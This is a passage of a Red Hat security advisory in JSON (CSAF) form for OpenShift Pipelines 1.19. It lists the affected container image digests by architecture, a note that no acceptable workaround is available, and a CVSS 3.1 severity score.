"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
